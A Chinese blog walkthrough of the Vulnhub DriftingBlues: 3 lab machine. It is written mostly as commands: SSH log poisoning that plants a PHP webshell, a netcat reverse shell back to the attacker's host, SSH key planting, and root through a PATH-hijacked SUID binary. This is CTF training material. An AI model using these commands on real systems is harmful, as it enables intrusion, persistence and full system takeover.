首页 > 其他分享 >Vulnhub: DriftingBlues: 3靶机

Vulnhub: DriftingBlues: 3靶机

时间:2023-08-13 16:58:06浏览次数:45  
标签:bin 192.168 DriftingBlues 111.192 uname Vulnhub 靶机 id ssh

kali:192.168.111.111

靶机:192.168.111.192

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.192

image

查看robots.txt得到提示

image

访问eventadmins提示littlequeenofspades.html

image

查看littlequeenofspades.html源码

image

base64解密后提示adminsfixit.php

image

访问后发现ssh日志内容会写入该文件

image

写入webshell

ssh '<?php system($_GET["cmd"]);?>'@192.168.111.192

image

执行命令

http://192.168.111.192/adminsfixit.php?cmd=id

image

获得反弹shell

http://192.168.111.192/adminsfixit.php?cmd=nc -e /bin/bash 192.168.111.111 4444

image

提权

robertj用户.ssh文件夹有写入权限

image

本地生成ssh公私钥,公钥文件名修改为authorized_keys后上传目标.ssh目录

ssh-keygen -f id_rsa
mv id_rsa.pub authorized_keys

image

登录后查找suid权限的文件

ssh [email protected] -i id_rsa
find / -perm -u=s 2> /dev/null

image

执行该文件的同时会执行uname命令

strings getinfo

image

修改环境变量提权为root

echo '/bin/bash' > /tmp/uname
chmod 777 /tmp/uname
export PATH=/tmp:$PATH
/usr/bin/getinfo

image

标签:bin,192.168,DriftingBlues,111.192,uname,Vulnhub,靶机,id,ssh
From: https://www.cnblogs.com/ctostm/p/17626784.html

相关文章

  • Vulnhub 靶场 MATRIX-BREAKOUT: 2 MORPHEUS
    前期准备:靶机地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/kali攻击机ip:192.168.11.11靶机ip:192.168.11.12一、信息收集及利用1.使用nmap对目标靶机进行扫描发现开放了22、80、81端口。2.80端口访问80端口:查看页面信息没发现什么重要信息,......
  • Vulnhub: ColddWorld: Immersion靶机
    kali:192.168.111.111靶机:192.168.111.183信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.183查看login的源码发现提示:page和文件/var/carls.txt漏洞利用wfuzz探测account.php页面发现文件包含,参数为pagewfuzz-c-w/opt/zidian/SecLists......
  • Vulnhub: DriftingBlues: 6靶机
    kali:192.168.111.111靶机:192.168.111.180信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.180查看robots.txt发现存在目录:/textpattern/textpattern访问后发现是textpatterncms目录爆破发现文件spammer,访问后发现是个压缩包,解压需要密码,......
  • Vulnhub: blogger:1靶机
    kali:192.168.111.111靶机:192.168.111.176信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.176在80端口的/assets/fonts/目录下发现blog目录,访问后发现为wordpress利用wpscan发现wordpress插件wpdiscuz存在任意文件上传漏洞wpscan--urlhtt......
  • Vulnhub: hacksudo: aliens靶机
    kali:192.168.111.111靶机:192.168.111.175信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.175目标80端口backup目录存在文件mysql.bak,下载后查看获得mysql账号密码登录9000端口的phpmyadmin,执行sql语句写入webshellselect'<?phpsystem($......
  • Vulnhub: BlueMoon: 2021靶机
    kali:192.168.111.111靶机:192.168.111.174信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17480端口目录爆破,发现文件:hidden_textgobusterdir-uhttp://192.168.111.174-w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-m......
  • vulnhub_DC_6_wp
    前言靶机地址:https://www.vulnhub.com/entry/dc-6,315/靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip攻击机地址:192.168.20.135靶机探测nmap-sn192.168.20.0/24192.168.20.149为靶机地址端口扫描nmap-p-192.168.20.149详细信息扫描nmap-A-p22,80192.......
  • Vulnhub: Wayne Manor:1靶机
    kali:192.168.111.111靶机:192.168.111.172信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.172根据提示修改hosts文件访问目标80,在主页发现三组数字,结合端口扫描的结果中21端口被过滤,猜测存在端口碰撞knock-v192.168.111.172300350400......
  • vlunhub靶场,kali扫不到靶机解决方法
    在靶机开机或者重启界面会出现下图界面,然后按e就可以进入编辑。 按e后就会进入下图界面。 在下图这个界面将 roquiet 改为 rwsingleinit=/bin/bash. 修改完成后按    ctrl+x  进入编辑输入ipa查看本地网卡名称,本机网络网卡名称为ens33ipa 进入i......
  • Vulnhub: shenron:3靶机
    kali:192.168.111.111靶机:192.168.111.171信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.171修改hosts后访问目标80端口,发现是wordpresswpscan收集目标用户,爆破出密码:iloverockyouwpscan--urlhttp://shenron/-euwpscan--urlhttp://......